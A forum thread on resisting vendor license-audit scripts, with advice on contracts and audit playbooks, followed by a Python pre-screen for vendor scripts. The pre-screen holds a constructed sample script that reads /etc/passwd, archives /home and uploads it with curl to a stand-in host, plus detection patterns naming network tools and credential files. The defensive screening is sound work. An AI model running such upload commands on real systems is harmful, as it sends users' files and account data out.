New audit tactic

In case you aren’t aware, the software vendors are getting increasingly clever in their ability to conduct audits. In this new trend that I am seeing, more and more software vendors are requiring customers to run scripts to verify license compliance before they will issue a quote to renew maintenance and support. They are essentially holding us hostage unless we “volunteer” for these ad hoc audits.

We are trying to develop a strategy / defense against these tactics but so far it has been difficult. Is anyone seeing this trend? What strategies are you using to combat them?

Never a dull moment, that is for sure. :wink:

1 Like

Yes, seen these. I had a long reply, decided to shorten it more as I could babble on about this topic.

Assuming there is no voluntary or involuntary audit clause in your EULA today, refuse their request as not being contractual. Be kind with this approach: you simply wish to remain within the contractual terms. Next, self-audit to verify you’re within your terms in case it goes south. Be prepared for a contract “revision” to include these missing parts during a future renewal. It will come.

If it is already in your EULA, voluntary or involuntary, ask for the documented process in its entirety: the procedure and terms on how the request would be conducted. Make this request as part of your contract renewal, new purchases, etc., so you’re not focusing on what they might perceive as a weakness when you’re simply wanting the facts without prompting an immediate audit. Publishers will normally decline offering you their audit process, citing various reasons, so you may need to push harder. If they’re on the up and up, why would your knowing the “how” be of any concern?

Concerning scripts - I’ve only had a few occasions where companies I worked for even permitted this action. Scripts, in my experience, normally pull more data than required to conduct a legitimate license review, though there are exceptions. The concerns surround whether their code is good, could it harm my environment, bring services down, or phone home unauthorized data to the publisher, to name a few?

Lastly, to your core question on strategy / defense, my advice is to craft an audit defense playbook end to end. This is a key fundamental in an ITAM program to mitigate risk. This can be a separate topic, so start high level: identify your internal team (ITAM, Legal, Procurement, Business side, Senior Leadership), draft procedures, and have prepared draft responses from initial notification to audit or license review closeout so you are in control of the audit and data. Keep your playbook within the team, no different than a publisher keeps their audit techniques close to their audit team. Secondly, identify high risk publishers, conduct internal reviews, and identify alternative products in case the relationship goes sour; this is also useful in negotiations.

In summary, determine if their request is legal/legitimate (in the contract). If challenged, possibly they will offer alternatives. Avoid running scripts due to the issues cited above or those from others here on the Forum. Request or suggest an alternative for validation of your use of the product that is agreeable to both parties. Develop your audit defense playbook with this topic incorporated so you have a well thought out runbook.

Hope this helps; let’s see what others here may offer as well.

Cheers

1 Like
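The reply above lists the reasons not to run a vendor-supplied script blind: it may pull more data than a license review needs, phone home, or do something destructive. Before anything executes, a first pass over the script text can surface exactly those three things, so the ITAM and security team can decide what to push back on. The following Python pre-screen is an added example, not code from either poster; the keyword patterns and the sample "license verification" script are constructed for illustration, and the patterns are heuristics that supplement, not replace, reading the script in full and running it only in an isolated host with egress blocked.

```python
import re

# Heuristic patterns (constructed for this example, not an exhaustive list):
# each category is something an ITAM/security reviewer wants to know about
# before a vendor-supplied "license verification" script is allowed to run.
CHECKS = {
    "network_egress": [
        r"\bcurl\b", r"\bwget\b", r"\bnc\b", r"\bscp\b", r"\bsftp\b",
        r"Invoke-WebRequest", r"Invoke-RestMethod", r"https?://",
    ],
    "destructive": [
        r"\brm\s+-[a-zA-Z]*r", r"Remove-Item", r"\bmkfs\b", r"\bdd\s+if=",
        r"\bsystemctl\s+(stop|disable)", r"Stop-Service",
    ],
    "privilege": [r"\bsudo\b", r"\bsu\s+-", r"\brunas\b", r"\bsetuid\b"],
    "sensitive_reads": [
        r"/etc/shadow", r"/etc/passwd", r"\.ssh/", r"id_rsa", r"/home\b",
        r"HKLM:\\SAM", r"Get-ChildItem\s+C:\\Users",
    ],
}
URL_RE = re.compile(r"https?://[^\s\"')]+")


def review_script(text):
    """Scan a script line by line; return {category: [(line_no, line), ...]}.
    Comment lines are skipped so a mention in a comment is not a finding."""
    findings = {cat: [] for cat in CHECKS}
    for no, line in enumerate(text.splitlines(), start=1):
        if line.strip().startswith("#"):
            continue
        for cat, patterns in CHECKS.items():
            if any(re.search(p, line) for p in patterns):
                findings[cat].append((no, line.strip()))
    return findings


def extract_urls(text):
    """Every URL literal in the script: where data would go if it phones home."""
    return URL_RE.findall(text)


def invoked_commands(text):
    """First token of each non-comment, non-empty line, in order, so the reviewer
    can compare what the script runs against what a license check actually needs."""
    cmds = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        cmds.append(s.split()[0])
    return cmds


def verdict(findings):
    """Coarse triage: anything that sends data out, deletes, or escalates is a
    hard stop; reads of sensitive locations mean the scope must be renegotiated."""
    if findings["network_egress"] or findings["destructive"] or findings["privilege"]:
        return "block"
    if findings["sensitive_reads"]:
        return "scope-review"
    return "manual-review"


# Constructed sample of what a vendor "license verification" script might look
# like; it is not any real vendor's script.
SAMPLE_SCRIPT = """#!/bin/sh
# vendor license verification (constructed sample)
hostname
rpm -qa | grep -i vendorproduct
cat /etc/passwd
tar czf /tmp/inv.tgz /home
curl -s -F file=@/tmp/inv.tgz https://audit.example.com/upload
rm -rf /tmp/inv.tgz
"""

if __name__ == "__main__":
    f = review_script(SAMPLE_SCRIPT)
    for cat, hits in f.items():
        for no, line in hits:
            print(f"{cat:16} line {no}: {line}")
    print("commands:", invoked_commands(SAMPLE_SCRIPT))
    print("urls:", extract_urls(SAMPLE_SCRIPT))
    print("verdict:", verdict(f))
```

On the constructed sample the screen flags the upload (network egress), the deletion, and the reads of /etc/passwd and all home directories, and returns "block"; the command list (hostname, rpm, cat, tar, curl, rm) is what you hand back to the publisher when asking why a product inventory needs anything beyond the package query. A script that only runs inventory commands comes back as "manual-review", which is still a read-through, not an approval.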